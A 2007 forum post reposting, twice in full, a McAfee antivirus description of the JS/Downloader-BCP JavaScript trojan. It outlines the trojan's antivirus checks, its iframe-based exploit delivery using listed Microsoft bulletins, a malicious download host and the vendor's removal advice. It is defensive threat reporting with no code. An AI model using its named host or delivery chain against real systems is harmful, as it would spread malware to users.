Posted by: Amker
« on: 16. June 2007., 15:15:05 »The JavaScript detected as JS/Downloader-BCP is responsible for downloading various other files that exploit past released Microsoft's vulnerabilities.
Characteristics -
Downloaders are designed to pull files from a remote website and execute the files that have been downloaded. The nature of the remote file may vary. As the presence of these trojans and remote files are discovered, sites hosting these files are frequently taken down, so the downloading may cease to function as expected. This may result in empty, 0 byte files or HTML error messages being downloaded instead, or the remote file simply not being downloaded at all.
The JavaScript detected as JS/Downloader-BCP is responsible for downloading various other JavaScripts / files that exploit past released Microsoft's vulnerabilities. This script checks for the presence of various antivirus software and then inserts an iframe which points to a malicious file that exploits some vulnerability. The decision about which mailicious file the iframe will point to, is taken based on the browser JS/Downloader-BCP is running in.
The downloaded scripts may use the following exploits to install trojans on the compromised machine
MS06-044
MS05-054
MS05-036
MS06-055
It tries to download the malicious code from
http://ijk.cc/E/[REMOVED]
Symptoms -
Upon execution, the trojan attempts to download files from the site: http://ijk.cc/E/[REMOVED]
Method of Infection -
N/A. Downloaders are not viruses, and as such do not themselves contain any method to replicate. However they may themselves be downloaded by other viruses and/or Trojans to be installed on the user's system.
Many of these additionally are mass spammed by the author to entice people into activating them.
Alternatively they may be installed by visiting a malicious web page (either by clicking on a link, or by the website hosting a scripted exploit which installs the Downloader onto the user's system with no user interaction.
Removal -
AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.
Additional Windows ME/XP removal considerations
McAfee
Characteristics -
Downloaders are designed to pull files from a remote website and execute the files that have been downloaded. The nature of the remote file may vary. As the presence of these trojans and remote files are discovered, sites hosting these files are frequently taken down, so the downloading may cease to function as expected. This may result in empty, 0 byte files or HTML error messages being downloaded instead, or the remote file simply not being downloaded at all.
The JavaScript detected as JS/Downloader-BCP is responsible for downloading various other JavaScripts / files that exploit past released Microsoft's vulnerabilities. This script checks for the presence of various antivirus software and then inserts an iframe which points to a malicious file that exploits some vulnerability. The decision about which mailicious file the iframe will point to, is taken based on the browser JS/Downloader-BCP is running in.
The downloaded scripts may use the following exploits to install trojans on the compromised machine
MS06-044
MS05-054
MS05-036
MS06-055
It tries to download the malicious code from
http://ijk.cc/E/[REMOVED]
Symptoms -
Upon execution, the trojan attempts to download files from the site: http://ijk.cc/E/[REMOVED]
Method of Infection -
N/A. Downloaders are not viruses, and as such do not themselves contain any method to replicate. However they may themselves be downloaded by other viruses and/or Trojans to be installed on the user's system.
Many of these additionally are mass spammed by the author to entice people into activating them.
Alternatively they may be installed by visiting a malicious web page (either by clicking on a link, or by the website hosting a scripted exploit which installs the Downloader onto the user's system with no user interaction.
Removal -
AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.
Additional Windows ME/XP removal considerations
McAfee